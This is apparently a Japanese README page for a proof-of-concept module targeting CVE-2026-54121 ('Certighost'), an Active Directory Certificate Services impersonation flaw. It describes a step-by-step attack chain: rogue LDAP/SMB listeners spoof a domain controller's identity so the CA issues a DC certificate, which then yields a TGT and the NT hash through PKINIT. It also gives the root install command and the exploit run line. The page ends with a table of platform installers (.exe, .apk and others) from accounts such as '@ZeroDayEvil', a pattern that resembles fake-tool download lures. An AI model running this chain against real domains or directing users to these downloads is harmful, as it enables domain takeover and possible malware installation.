
CVE-2026-54121(Certighost)の概念実証モジュール。不正なLDAP/SMBリスナーを介してAD CSの登録検証を悪用し、ドメインコントローラーになりすましてPKINIT経由で権限昇格を行う。
🛡 AI Security Tool モジュール
CVE-2026-54121: Active Directory Certificate Services なりすまし (Certighost)
AI Security Tool エコシステム向け公式セキュリティ監査モジュール
🌐 Web デモ • 📚 プロジェクトサイト • 💬 コミュニティチャット
ウェブサイトナビゲーション: ホーム • アップデート • ダウンロード • モジュール
本モジュールは、Certighost と呼ばれる CVE-2026-54121 の診断機能を提供します。この脆弱性は、コンピューターアカウントの証明書登録の検証フェーズにおいて、Active Directory Certificate Services (AD CS) 内に存在します。
標準的な低権限のドメイン資格情報を持つ攻撃者は、新しいコンピューターアカウントを作成し、細工された cdc (制御された IP リスナー) および rmd (ターゲット DC の FQDN) 属性を含む証明書要求を送信します。Certificate Authority (CA) がマシンの ID を検証するために接続してくると、不正な LDAP (ポート 389) および SMB/LSA (ポート 445) リスナーがターゲットのドメインコントローラーの ID 属性 (sAMAccountName、SID、dNSHostName) を偽装します。これにより CA は正規のドメインコントローラー証明書を発行してしまい、PKINIT を介した完全なドメイン侵害が可能になります。
「マシンとして認証し、ドメイン全体へ昇格する。」
Certighost は、CA の ID 解決パイプラインを汚染することで、従来の AD CS テンプレートのアクセス許可を回避します。有効なドメインコントローラー証明書を取得すると、即座に PKINIT 認証が可能になり、TGT 資格情報キャッシュ (.ccache) とターゲット DC の NT ハッシュの両方が得られます。
graph TD
A[Low-Priv Domain User] -->|1. Create Computer Account| B[Domain Controller]
A -->|2. Start Rogue SMB 445 / LDAP 389 Listeners| C[Attacker Machine]
A -->|3. Submit Cert Request with cdc & rmd Attributes| D[Active Directory CA]
D -->|4. CA Lookups Connect to Rogue Listeners| C
C -->|5. Validate via Netlogon & Return Target DC Identity| D
D -->|6. Issue Valid DC Certificate .pfx| A
A -->|7. Perform PKINIT with DC Certificate| E[Full Domain Takeover / NT Hash Export]ms-DS-MachineAccountQuota を 0 に設定し、非管理者ユーザーが新しいコンピューターオブジェクトを作成できないようにします。EDITF_ATTRIBUTESUBJECTALTNAME2 (ESC6) がオフになっていることを確認します。⚠️ 重要: 本モジュールは AI Security Tool フレームワーク内での安全な診断テスト用に設計されています。昇格された管理者権限を持つ、許可されたターゲットに対してのみ実行してください。
診断および監視スクリプトを実行するには、コアとなる AI Security Tool フレームワークをインストールします:
不正な LDAP/SMB リスナーと証明書処理に必要な Python ライブラリをインストールします:
# Install python dependencies
sudo pip install --break-system-packages git+https://github.com/fortra/impacket.git cryptography pyasn1 asn1crypto pycryptodome dnspython
# Execute Certighost proof-of-concept (Requires root for ports 389/445)
sudo python3 certighost.py -d playground.local -u lowpriv -p 'Password1234' --dc-ip 192.168.1.10コミュニティによって維持されている脆弱性スキャナーモジュール、PoC スクリプト、および研究リポジトリ:
4 モジュール@ZeroDayEvil
@ZeroDayEvil
@ZeroDayEvil
@ZeroDayVPN
3 モジュール@ZeroDayEvil
@ZeroDayVPN
@ZeroDayEvil
2 モジュール@ZeroDayEvil
@ZeroDayVPN
本ツールおよびセキュリティ分析は、許可されたシステム監査、防御的研究、およびペネトレーションテストの業務に厳密に限定して提供されます。
システム所有者からの明示的な書面による許可なく、ドメイン環境に対して CVE-2026-54121 を実行することは違法です。著者は、許可されていないドメイン侵害、データ損失、またはシステム障害について一切の責任を負いません。
セキュリティ研究コミュニティからのコントリビューションを歓迎します! 主なコントリビューション分野:
AI Security Tool — サイバーセキュリティ専門家のためのターミナルワークフローと自動化を再構想する。
| 仕様 | 割り当てられた値 | 備考 |
|---|
| CVE 識別子 | CVE-2026-54121 | Active Directory Certificate Services なりすまし |
| 深刻度評価 | Critical (CVSS v3.1: 9.8) | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H |
| 脆弱性の種類 | CWE-287 / CWE-290 | 不適切な認証 / なりすましによる認証バイパス |
| 影響を受けるコンポーネント | Active Directory Certificate Services (AD CS) | 証明書登録および ID 検証パイプライン |
| 攻撃ベクトル | ネットワーク | SMB、LDAP、RPC プロトコルを介してリモートで実行 |
| 必要な権限 | 低権限 | 標準のドメインユーザーアカウント (マシンアカウントを追加する権限) |
| OS / プラットフォーム | バージョン | アーキテクチャ / 形式 | リリース日 | ステータス | ダウンロードリンク |
|---|
| 🪟 Windows | v6.3.20 | x64 インストーラー (.exe) | 2026-09-08 | 🟢 最新 | .exe をダウンロード |
| 🪟 Windows | v6.3.20 | x64 ポータブル (.tar.gz) | 2026-09-08 | 🟢 最新 | .tar.gz をダウンロード |
| 🍏 macOS | v5.3.29 | Apple Silicon M1/M2/M3 (.dmg) | 2026-09-05 | 🟢 安定版 | .dmg をダウンロード |
| 🐧 Linux | v5.3.27 | ユニバーサル x64 (.tar.gz) | 2026-09-01 | 🟢 安定版 | .tar.gz をダウンロード |
| 🤖 Android | v8a 5.3.27 | ARM64 APK (.apk) | 2026-09-01 | 🟢 安定版 | .apk をダウンロード |